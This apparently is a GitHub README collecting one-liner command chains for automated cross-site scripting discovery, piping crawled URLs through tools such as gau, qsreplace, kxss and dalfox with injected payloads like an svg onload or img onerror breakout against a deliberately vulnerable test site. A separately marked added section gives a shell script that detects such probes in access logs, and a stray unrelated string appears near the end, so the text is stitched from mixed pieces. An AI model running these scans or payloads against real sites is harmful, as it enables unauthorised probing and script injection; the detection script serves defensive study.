0xElkot/One-liner-XSS-Scanner

One-liner-XSS-Scanner

This is a collection of commands that help you find XSS via automation.

Via Bash Script

Tools:

kxss: To find reflected values.

uro: Declutters URL lists for crawling.

gf: A wrapper around grep, to help you grep for things.

qsreplace: To replace all query string values with a user-supplied value.

freq: To find alert values.

airixss: To find XSS during recon.

dalfox: A powerful XSS scanner.

First Case

echo http://testphp.vulnweb.com | gau | gf xss | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq

cat param.txt | kxss | awk '{print $9}' | dalfox pipe

cat param.txt | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"
echo http://testphp.vulnweb.com | gau | gf xss | uro | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"
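How the one-liners above look from the server side, as an added example that is not part of this repository: a shell function that flags access-log requests whose query values decode to a tag breakout with an inline event handler, and notes when every parameter carries the same value (the trace qsreplace leaves). The log lines, paths and addresses are constructed, and the function name `detect_xss_probes` is hypothetical; it assumes combined log format with the payload percent-encoded in the request line.

```shell
#!/bin/sh
# Added example (not from the repository). Log lines below are constructed.
sample_log() {
    cat <<'EOF'
203.0.113.7 - - [01/Jan/2025:10:00:00 +0000] "GET /product.php?id=%22%3E%3Csvg+onload%3Dconfirm%281%29%3E HTTP/1.1" 200 4821 "-" "-"
203.0.113.7 - - [01/Jan/2025:10:00:01 +0000] "GET /search.php?q=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&page=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E HTTP/1.1" 200 5120 "-" "-"
198.51.100.20 - - [01/Jan/2025:10:00:02 +0000] "GET /search.php?q=blue+shoes&page=2 HTTP/1.1" 200 7342 "-" "-"
198.51.100.20 - - [01/Jan/2025:10:00:03 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "-"
EOF
}

# Reads combined-format access log lines on stdin; prints "client verdict path".
detect_xss_probes() {
    awk '
    function hexval(c) { return index("0123456789abcdef", tolower(c)) - 1 }
    # Percent-decode one query value; "+" encodes a space in query strings.
    function urldecode(s,    out, i, c, hi, lo) {
        gsub(/\+/, " ", s); out = ""
        for (i = 1; i <= length(s); i++) {
            c = substr(s, i, 1)
            if (c == "%" && i + 2 <= length(s)) {
                hi = hexval(substr(s, i + 1, 1)); lo = hexval(substr(s, i + 2, 1))
                if (hi >= 0 && lo >= 0) { out = out sprintf("%c", hi * 16 + lo); i += 2; continue }
            }
            out = out c
        }
        return out
    }
    {
        if (split($0, q, "\"") < 3) next      # q[2] is the request line
        split(q[2], req, " ")                  # method, target, protocol
        qpos = index(req[2], "?"); if (qpos == 0) next
        np = split(substr(req[2], qpos + 1), pair, "&")
        hits = 0; same = 1
        for (i = 1; i <= np; i++) {
            eq = index(pair[i], "=")
            val = eq ? urldecode(substr(pair[i], eq + 1)) : ""
            if (i == 1) first = val; else if (val != first) same = 0
            # Tag breakout plus an inline event handler, as in the payloads above.
            if (val ~ /[<>]/ && tolower(val) ~ /on[a-z]+ *=/) hits++
        }
        # qsreplace rewrites every value, so identical values raise confidence.
        if (hits) print $1, ((np > 1 && same) ? "all-params-identical" : "single-value"), substr(req[2], 1, qpos - 1)
    }'
}

sample_log | detect_xss_probes
```

The ordinary search request and the request without a query string produce no output; only the two constructed probe lines are reported.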


1__JCZZJX2T1XiHxH0FZPTWw

You can read the full methodology on Medium.
